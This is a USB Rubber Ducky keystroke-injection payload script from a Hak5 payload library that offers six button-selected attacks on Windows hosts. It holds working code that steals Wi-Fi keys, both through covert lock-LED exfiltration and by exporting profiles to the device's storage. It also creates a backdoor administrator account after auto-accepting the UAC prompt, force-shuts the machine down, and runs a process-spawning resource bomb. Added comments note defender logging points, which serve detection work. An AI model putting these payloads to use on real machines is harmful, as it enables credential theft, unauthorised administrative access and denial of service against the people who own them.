GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/general/OneDuckToQuackThemAll/Payload.txt
REM Title: One Duck To Quack Them All
REM Author: SaintCrossbow
REM Description: Pack multiple attacks in a single payload - click button to advance the attack
REM Click 1: LED G slow blink - Stealth exfil WiFi key (modified from original Hak5 payload)
REM Click 2: LED R slow blink - Direct USB copy of WiFi keys
REM Click 3: LED G fast blink - Add backdoor user
REM Click 4: LED R fast blink - Shutdown PC immediately
REM Click 5: LED R/G alternate - Fork bomb (really resource bomb)
REM Click 6: LED G morse A - USB storage
REM Target: Windows
REM Props: Darren Kitchen for the basis of stealth copy of wifi key
REM Defender note: every mode below types its commands into the Windows Run dialog
REM (GUI r) as the logged-on user. PowerShell command-line / script-block logging and
REM USB device allow-listing (keyboard and mass-storage class) are the controls that
REM surface or stop this class of payload.
REM Setup: enumerate as a keyboard only, wait 2 s, show green.
ATTACKMODE HID
DELAY 2000
LED_G

REM Selected mode. Each button press after the initial WAIT_FOR_BUTTON_PRESS
REM increments it (see BUTTON_DEF further down), so "Click N" in the header
REM corresponds to $MODESELECT == N-1.
VAR $MODESELECT = 0
REM Observation window (ms) during which more presses can still change the mode.
VAR $CLICK_OBS_WINDOW = 5000
REM Elapsed time (ms) in the current observation window; reset to 0 on each press.
VAR $CLICK_OBS_TIME = 0
REM LED on/off half-period (ms); also the amount added to $CLICK_OBS_TIME per step.
VAR $CLICK_TICK = 800
REM Click 1 handler: read the Wi-Fi key of the host's first network profile and
REM send it back to the device by toggling the keyboard lock LEDs (no storage mode).
REM Host-side traces: three powershell command lines typed into the Run dialog and
REM a temporary file $env:tmp\tmptst that the last command deletes again.
FUNCTION QUIET_STEAL_WIFI()
LED_R
ATTACKMODE HID
REM Random inter-keystroke delays while the commands are typed.
$_JITTER_ENABLED = TRUE
DELAY 2000
GUI r
DELAY 1000
REM Step 1: "netsh wlan show profile ... key=clear" for the first NetConnectionProfile,
REM keeping only the SSID and key lines, written to $env:tmp\tmptst.
STRING powershell "$cssid= (Get-NetConnectionProfile).Name[0]; netsh wlan show profile name=("$cssid") key=clear|?{$_-match'SSID n|Key C'}|%{($_ -split':')[1]}>$env:tmp\tmptst"
DELAY 300
ENTER
DELAY 3000
GUI r
DELAY 300
REM Jitter off: the long encoding command below is typed at full speed.
$_JITTER_ENABLED = FALSE
REM Step 2: rewrite the file as SendKeys tokens, one token per bit of each byte
REM (0x80 first): set bit -> '%{NUMLOCK}', clear bit -> '%{CAPSLOCK}', and a final
REM '%{SCROLLLOCK}' as end-of-data marker.
STRINGLN powershell "foreach($b in $(cat $env:tmp\tmptst -En by)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'} else {$o+='%{CAPSLOCK}'}}};$o+='%{SCROLLLOCK}';echo $o >$env:tmp\tmptst"
DELAY 100
GUI r
DELAY 300
REM Step 3 (typed now, executed by the ENTER below): replay the token string with
REM System.Windows.Forms.SendKeys, then delete the temp file.
STRING powershell "$o=(cat $env:tmp\tmptst);Add-Type -A System.Windows.Forms; [System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\tmptst"
DELAY 100
REM Remember the host's lock-key state so the toggles below can be undone afterwards.
SAVE_HOST_KEYBOARD_LOCK_STATE
REM Exfil mode: lock-LED changes reported by the host are captured as data; LEDs show activity.
REM Enabled before ENTER so the first toggle is not missed.
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
DELAY 100
ENTER
REM Blocks until the trailing '%{SCROLLLOCK}' marker arrives.
WAIT_FOR_SCROLL_CHANGE
LED_G
$_EXFIL_MODE_ENABLED = FALSE
$_EXFIL_LEDS_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE
END_FUNCTION
REM Click 2 handler: expose the device as a USB drive and have the host write its
REM Wi-Fi profiles, keys included, onto it with "netsh wlan export profile key=clear"
REM (netsh writes one XML file per profile).
REM Host-side traces: a new removable volume labelled 'Ducky', an interactive
REM powershell window, and the netsh export command line. Removable-storage
REM device control blocks this mode even when the keyboard part is allowed.
FUNCTION DIRECT_STEAL_WIFI()
REM TODO Replace in final payload with DUCKY
REM NOTE(review): the TODO above presumably refers to the volume label 'Ducky' used below -- confirm.
LED_R
REM Hide the payload files while the storage partition is visible to the host.
HIDE_PAYLOAD
ATTACKMODE HID STORAGE
$_JITTER_ENABLED = TRUE
REM Much longer wait than the HID-only modes, presumably to let the host mount the volume.
DELAY 9000
GUI r
DELAY 1500
REM Interactive PowerShell session rather than a one-shot command.
STRINGLN powershell
DELAY 3000
REM Locate the volume by filesystem label, change into it, export the profiles there.
STRINGLN $d=(Get-Volume -FileSystemLabel 'Ducky').DriveLetter+':'; cd $d; netsh wlan export profile key=clear
DELAY 3000
STRINGLN exit
RESTORE_PAYLOAD
LED_G
END_FUNCTION
71
72
REM Click 3 handler: create the local account "newuser" (password "newpass") and add
REM it to the local Administrators group from an elevated cmd window.
REM Needs an admin-capable logged-on user: CTRL-SHIFT ENTER in the Run dialog requests
REM elevation and ALT y presumably answers the UAC consent prompt. Running as a
REM standard user (credential prompt instead of consent) is the least-privilege
REM mitigation for this step.
REM Host-side traces: elevation of cmd.exe, the net.exe "user /add" and "localgroup"
REM command lines, and security events 4720 (account created) / 4732 (member added
REM to a local group). The fixed account name is a ready-made indicator.
FUNCTION CREATE_BACKDOOR()
LED_R
ATTACKMODE HID
$_JITTER_ENABLED = TRUE
DELAY 2000
GUI r
DELAY 1000
STRING cmd
DELAY 500
REM Run as administrator.
CTRL-SHIFT ENTER
DELAY 2000
REM "Yes" on the UAC prompt.
ALT y
DELAY 1000
STRINGLN net user /add newuser newpass
DELAY 500
STRINGLN net localgroup administrators newuser /add
DELAY 500
STRINGLN exit
LED_G
END_FUNCTION
REM I realize this is more of an iterative power hog than a strictly ballroom fork bomb
REM Click 5 handler: host denial of service -- a PowerShell loop that keeps starting
REM calc.exe. Per the comment above, a resource hog rather than a real fork bomb.
REM Unlike the other handlers it never switches the LED back to green, and the caller
REM does not RESTART_PAYLOAD, so the device is finished once the command is typed.
REM Host-side trace: a powershell command line containing "while(1){&calc}".
FUNCTION FORK_BOMB()
LED_R
ATTACKMODE HID
$_JITTER_ENABLED = TRUE
DELAY 2000
GUI r
DELAY 1000
STRING powershell "while(1){&calc}"
DELAY 200
ENTER
END_FUNCTION
REM Click 4 handler: forced immediate shutdown of the host
REM ("shutdown -t 0 -f -s": zero-second timeout, force apps closed, shut down).
REM The caller does not RESTART_PAYLOAD after this mode.
FUNCTION IMMEDIATE_SHUTDOWN()
LED_R
ATTACKMODE HID
$_JITTER_ENABLED = TRUE
DELAY 2000
GUI r
DELAY 1000
STRING shutdown -t 0 -f -s
DELAY 200
ENTER
END_FUNCTION
REM Default is single click
LED_G
REM The first press only releases this wait. BUTTON_DEF is defined after it, so
REM $MODESELECT stays 0 (click 1) unless further presses follow.
WAIT_FOR_BUTTON_PRESS

REM Clicking resets observation time to ensure you have right mode
REM So any attack will delay for at least $CLICK_OBS_WINDOW ms after the last click
BUTTON_DEF
$CLICK_OBS_TIME = 0
$MODESELECT = ( $MODESELECT + 1 )
END_BUTTON

REM Start the attack
REM Mode-select loop: blink the pattern for the current $MODESELECT until
REM $CLICK_OBS_TIME reaches $CLICK_OBS_WINDOW. Only the two DELAY $CLICK_TICK steps
REM at the bottom are counted, so every pass adds 2 * $CLICK_TICK (1600 ms) and the
REM pattern delays come on top; with the defaults that is 4 passes, i.e. >= 6.4 s.
WHILE ( $CLICK_OBS_TIME < $CLICK_OBS_WINDOW )
REM Patterns: 0 green slow, 1 red slow, 2 green fast, 3 red fast,
REM 4 red/green alternating, 5 and above green short-long ("morse A").
IF ( $MODESELECT == 0) THEN
LED_G
ELSE IF ( $MODESELECT == 1 ) THEN
LED_R
ELSE IF ( $MODESELECT == 2 ) THEN
LED_G
DELAY 100
LED_OFF
DELAY 100
LED_G
DELAY 100
LED_OFF
DELAY 100
LED_G
DELAY 100
ELSE IF ( $MODESELECT == 3 ) THEN
LED_R
DELAY 100
LED_OFF
DELAY 100
LED_R
DELAY 100
LED_OFF
DELAY 100
LED_R
DELAY 100
ELSE IF ( $MODESELECT == 4 ) THEN
LED_R
DELAY 200
LED_G
DELAY 200
LED_R
DELAY 200
LED_G
DELAY 200
ELSE
LED_G
DELAY 100
LED_OFF
DELAY 100
LED_G
DELAY 500
LED_OFF
DELAY 100
END_IF
DELAY $CLICK_TICK
$CLICK_OBS_TIME = ( $CLICK_OBS_TIME + $CLICK_TICK )
LED_OFF
DELAY $CLICK_TICK
$CLICK_OBS_TIME = ( $CLICK_OBS_TIME + $CLICK_TICK )
END_WHILE

REM Main attack
REM Modes 0-2 restart the payload afterwards (back to WAIT_FOR_BUTTON_PRESS);
REM modes 3 and 4 end the script; any higher value redefines the button to restart
REM the payload and exposes the storage partition to the host.
IF ( $MODESELECT == 0) THEN
QUIET_STEAL_WIFI()
RESTART_PAYLOAD
ELSE IF ( $MODESELECT == 1 ) THEN
DIRECT_STEAL_WIFI()
RESTART_PAYLOAD
ELSE IF ( $MODESELECT == 2 ) THEN
CREATE_BACKDOOR()
RESTART_PAYLOAD
ELSE IF ( $MODESELECT == 3 ) THEN
IMMEDIATE_SHUTDOWN()
ELSE IF ( $MODESELECT == 4 ) THEN
FORK_BOMB()
ELSE
REM Click 6 and beyond: plain USB storage mode; the button now restarts the payload.
BUTTON_DEF
RESTART_PAYLOAD
END_BUTTON
ATTACKMODE HID STORAGE
LED_G
END_IF